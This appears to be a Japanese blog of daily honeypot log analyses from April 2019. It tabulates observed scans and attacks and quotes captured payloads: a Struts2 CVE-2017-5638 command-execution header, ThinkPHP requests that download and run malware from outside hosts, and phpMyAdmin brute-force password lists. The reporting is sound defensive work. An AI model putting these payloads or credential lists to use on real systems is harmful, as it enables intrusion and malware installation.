BW-Potのログ分析 (2019/04/22)

本日の総アクセス件数は205件です。送信元IP数は71IPです。

気になる通信は特にありませんでした。

件数 種別 リクエス
67 phpMyAdminに関する攻撃 POST /phpmyadmin/
65 アクセス GET /
46 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
4 不正中継の調査 GET www.baidu[.]com/
2 phpMyAdminに関する調査 GET /phpMyAdmin/scripts/setup.php
2 phpMyAdminに関する調査 GET /phpmyadmin/scripts/setup.php
2 phpMyAdminに関する調査 GET /pma/scripts/setup.php
2 phpMyAdminに関する調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 不明 GET /script
1 不正中継の調査 GET api.binance[.]com/api/v1/depth?symbol=ETHBTC
1 不正中継の調査 GET api.binance[.]com/api/v3/order
1 不正中継の調査 GET www.binance[.]com/api/v3/order
1 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi
1 DFindによるスキャン GET /w00tw00t.at.ISC.SANS.DFind:)
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt
1 Tomato RAFに関する調査 GET /admin-scripts.asp
1 phpMyAdminに関する調査 GET /MyAdmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /myadmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /phpmy/scripts/setup.php
1 アクセス GET /favicon.ico
1 クローリング GET /robots.txt
1 サイトの構成調査 GET /sitemap.xml

BW-Potのログ分析 (2019/04/21)

本日の総アクセス件数は139件です。送信元IP数は56IPです。

気になる通信は特にありませんでした。

件数 種別 リクエス
69 phpMyAdminに関する攻撃 POST /phpmyadmin/
55 アクセス GET /
3 不正中継の調査 GET 5.188.210[.]101/echo.php
2 FreePBXに関する調査 GET /a2billing/admin/Public/PP_error.php?c=accessdenied
2 FreePBXに関する調査 GET /recordings/
2 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
1 不正中継の調査 GET api.binance[.]com/api/v1/time
1 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi
1 不正中継の調査 POST 192.168.0.[1]4/tmUnblock.cgi
1 phpMyAdminに関する調査 GET /phpMyAdmin/scripts/setup.php
1 www.probethenet[.]com scannerによるスキャン HEAD /redirect.php
1 クローリング HEAD /robots.txt

BW-Potのログ分析 (2019/04/20)

本日の総アクセス件数は289件です。送信元IP数は79IPです。

気になる通信は特にありませんでした。

件数 種別 リクエス
72 phpMyAdminに関する攻撃 POST /phpmyadmin/
68 アクセス GET /
3 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi
2 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
1 不正中継の調査 HEAD 112.124.42[.]80/
1 不正中継の調査 POST 5.180.40[.]102/tmUnblock.cgi
1 DFindによるスキャン GET /w00tw00t.at.ISC.SANS.DFind:)
1 HIKVISION製の監視カメラの設定ファイルに関する調査 GET /System/configurationFile/?auth=YWRtaW46MTEKYOBA
1 Kubernetesに関する調査 GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt
1 WordPressに関する調査 GET /wp-login.php
1 WordPressのユーザー情報の取得 GET ///?author=1
1 WordPressのユーザー情報の取得 GET ///wp-json/wp/v2/users/
1 WordPressのユーザー情報の取得 GET /wp-json/wp/v2/users/
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=admin
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=pass
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=apache&pma_password=apache
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=blog&pma_password=blog
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=db&pma_password=db
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=dbs&pma_password=dbs
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=http&pma_password=http
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=nas&pma_password=nas
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=nginx&pma_password=nginx
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=project&pma_password=project
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456789
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567890
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qwe
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasd
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasdzxc
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2011
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2012
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2014
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2017
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2018
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2019
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2020
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=321
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=4321
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=54321
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=654321
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=666666
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=NAS
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=Password
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=Password1
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=ROOT
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=aa123456
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=abc123
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=acces
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=acceso
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=access
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=access123
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=admin
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=admin123
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=administrator
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backup
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdb
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdbs
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backups
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupserver
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=bitcoin
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=blogs
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=charlie
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=confidential
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=database
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=db
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dbs
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=developer
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dollars
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=donald
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=files
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=hello
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=host
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=iloveyou
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=letmein
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=linux
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=login
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=master
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=michael
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=monkey
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=music
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=mysql
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=onetwothree
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass1234
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass2018
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passw0rd
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password1
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password123
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passwords
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=princess
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qazwsx
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qnap
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=queen
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qwerty
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qwerty123
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=r00t
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rock
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root123
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root1234
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rootadmin
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=secure
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=security
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=senha
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=server
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=shop
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=solo
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=sqlaccess
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=sunshine
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=test
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor321
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trump
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trustno1
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=unix
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=usa
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=users
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=web
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webadmin
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webmaster
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webs
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=welcome
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=whatever
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=wordpres
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=wordpress
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=shopdb&pma_password=shopdb
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=sql&pma_password=sql
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=ueer&pma_password=pass
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=web&pma_password=web
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=blog
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=pass
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=password
1 phpMyAdminに関する攻撃 GET /phpmyadmin/index.php?lang=en&pma_username=wp&pma_password=wp
1 phpMyAdminに関する調査 GET /index.php?lang=en
1 phpMyAdminに関する調査 GET /mysql/admin/index.php?lang=en
1 phpMyAdminに関する調査 GET /mysql/dbadmin/index.php?lang=en
1 phpMyAdminに関する調査 GET /mysql/mysqlmanager/index.php?lang=en
1 phpMyAdminに関する調査 GET /mysql/sqlmanager/index.php?lang=en
1 phpMyAdminに関する調査 GET /phpmyadmin/index.php?lang=en
1 クローリング GET /robots.txt
1 サイトの構成調査 GET /sitemap.xml
1 環境設定の調査 GET /.env

BW-Potのログ分析 (2019/04/19)

本日の総アクセス件数は283件です。送信元IP数は74IPです。

拡張子が以下のような通信先に対し、
Apache Struts2脆弱性(CVE-2017-5638)に関する通信を観測しています。
・.do
・.htm
・.html
・.jsp
・.actioon

Conternt-Type

Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
件数 種別 リクエス
74 phpMyAdminに関する攻撃 POST /phpmyadmin/
62 アクセス GET /
8 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html/
6 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /login.do
3 Amazon EC2 インスタンスメタデータの調査 GET 169.254.169[.]254/latest/meta-data
3 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /index.action
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /struts2-rest-showcase/orders.xhtml
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /index.do
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /home.do
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /home.htm
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /home.jsp
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /home.xhmtl
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /index.htm
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /index.html
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /index.jsp
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /index.xhtml
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /login.action
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /login.htm
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /login.xhtml
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /main.action
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /main.do
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /main.htm
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /main.jsp
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /main.xhtml
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /register.action
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /register.do
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /register.xhtml
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /site.action
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /site.do
3 Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 GET /site.xhtml
3 環境設定の調査 GET /.env
2 不正中継の調査 GET www.msftncsi[.]com/ncsi.txt
2 D-Link デバイスに関する調査 GET /HNAP1/
2 SQLiteに関する調査 GET /SQLite/main.php
2 SQLiteに関する調査 GET /SQLiteManager-1.2.4/main.php
2 SQLiteに関する調査 GET /SQLiteManager/main.php
2 SQLiteに関する調査 GET /SQlite/main.php
2 SQLiteに関する調査 GET /agSearch/SQlite/main.php
2 SQLiteに関する調査 GET /sqlite/main.php
2 SQLiteに関する調査 GET /sqlitemanager/main.php
2 SQLiteに関する調査 GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php
2 phpMyAdminに関する調査 GET /phpmyadmin/
2 phpMyAdminに関する調査 GET /phpmyadmin/scripts/setup.php
2 不明 GET /hudson/script
2 不明 GET /main.php
2 不明 GET /script
1 不正中継の調査 GET api.binance[.]com/api/v1/ticker/24hr?symbol=BTCUSDT
1 不正中継の調査 GET api.binance[.]com/api/v1/time
1 Apache Tomcat脆弱性(CVE-2017-12617)に関する攻撃 PUT /JJa06kSy21.jsp/
1 D-Link デバイスに関する調査 GET /HNAP1
1 DFindによるスキャン GET /w00tw00t.at.ISC.SANS.DFind:)
1 FreePBXに関する調査 GET /admin//config.php
1 FreePBXに関する調査 GET /admin/assets/js/views/login.js
1 NMAPによるスキャン GET /Nmap/folder/check1555640709
1 NMAPによるスキャン GET /NmapUpperCheck1555640709
1 NMAPによるスキャン GET /evox/about
1 NMAPによるスキャン GET /nmaplowercheck1555640709
1 NMAPによるスキャン POST /sdk
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt
1 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
1 Tomcat管理ページへのブルートフォース攻撃 HEAD /manager/html
1 アクセス GET /favicon.ico
1 アクセス HEAD /
1 クローリング GET /robots.txt
1 サイトの構成調査 GET /sitemap.xml

参考リンク

BW-Potのログ分析 (2019/04/18)

本日の総アクセス件数は166件です。送信元IP数は85IPです。

新規の通信は観測できませんでした。

件数 種別 リクエス
72 phpMyAdminに関する攻撃 POST /phpmyadmin/
63 アクセス GET /
3 Amazon EC2 インスタンスメタデータの調査 GET 169.254.169[.]254/latest/meta-data
2 不正中継の調査 GET www.msftncsi[.]com/ncsi.txt
2 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi
2 不明 OPTIONS /
1 Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 GET /cgi-bin/config.exp
1 D-Link デバイスに関する調査 GET /HNAP1/
1 Joomla!に関する調査 GET /administrator/index.php
1 ThinkPHPに関する攻撃 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php
1 ThinkPHPに関する攻撃 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mlmlvvtftdxevaq1768.exe');start%20C:/Windows/temp/mlmlvvtftdxevaq1768.exe
1 ThinkPHPに関する攻撃 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mlmlvvtftdxevaq1768.exe');start%20C:/Windows/temp/mlmlvvtftdxevaq1768.exe
1 ThinkPHPに関する調査 GET /TP/public/index.php
1 Tomato RAFに関する調査 GET /admin-scripts.asp
1 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
1 WordPressに関する調査 GET /blog/wp-login.php
1 WordPressに関する調査 GET /cms/wp-login.php
1 WordPressに関する調査 GET /wordpress/wp-login.php
1 WordPressに関する調査 GET /wp/wp-login.php
1 WordPressに関する調査 GET /wp1/wp-login.php
1 WordPressに関する調査 GET /wp2/wp-login.php
1 WordPressに関する調査 GET /wp3/wp-login.php
1 WordPressに関する調査 GET /wp4/wp-login.php
1 WordPressに関する調査 GET /wp5/wp-login.php
1 WordPressに関する調査 GET /wp6/wp-login.php
1 WordPressに関する調査 GET /wp7/wp-login.php
1 WordPressに関する調査 GET /wp8/wp-login.php
1 環境設定の調査 GET /.env

BW-Potのログ分析 (2019/04/17)

本日の総アクセス件数は494件です。送信元IP数は81IPです。

以下のpathに同一IPから来ていたので、すべてVOIP関連と判断しています。

  • /aastra/
  • /configs/
  • /gs/
  • /lib/
  • /polycom/
  • /provision/
  • /provisioning/
  • /spa/
  • /spa2102/
  • /tftp/
  • /voip_provisioning/
  • /xmlservices/
件数 種別 リクエス
293 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
73 phpMyAdminに関する攻撃 POST /phpmyadmin/
59 アクセス GET /
2 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi
2 phpMyAdminに関する調査 GET /phpMyAdmin/scripts/setup.php
2 phpMyAdminに関する調査 GET /phpmyadmin/scripts/setup.php
2 phpMyAdminに関する調査 GET /pma/scripts/setup.php
2 phpMyAdminに関する調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 クローリング GET /robots.txt
1 不正中継の調査 GET api.binance[.]com/api/v1/time
1 不正中継の調査 GET api.huobi[.]pro/market/detail?symbol=ethusdt
1 不正中継の調査 GET www.binance[.]com/api/v1/ticker/bookTicker?symbol=ETHBTC
1 Apache Struts 2に関する調査 GET /index.action
1 Apache Struts 2に関する調査 GET /struts2-rest-showcase/orders.xhtml
1 Apache Strutsに関する調査 GET /index.do
1 DFindによるスキャン GET /w00tw00t.at.ISC.SANS.DFind:)
1 Kubernetesに関する調査 GET /api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp
1 ThinkPHPに関する攻撃 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://81.6.42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;
1 ThinkPHPに関する攻撃 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php
1 ThinkPHPに関する攻撃 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/iqvaiqxsywjnwem15275.exe');start%20C:/Windows/temp/iqvaiqxsywjnwem15275.exe
1 ThinkPHPに関する攻撃 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/iqvaiqxsywjnwem15275.exe');start%20C:/Windows/temp/iqvaiqxsywjnwem15275.exe
1 WordPressに関する調査 GET /wp-login.php
1 WordPressのユーザー情報の取得 GET ///?author=1
1 WordPressのユーザー情報の取得 GET ///wp-json/wp/v2/users/
1 WordPressのユーザー情報の取得 GET /wp-json/wp/v2/users/
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=168168&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=MySQL&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=Ucloud.cn&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=access&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=admin&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=admin123&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=apache&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=autoset&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=database&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=huweishen.com&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=master&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=mysql&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=mysql123&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=oracle&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=r00t&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=redhat&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=root&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=toor&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=user&server=1
1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=wdlinux.cn&server=1
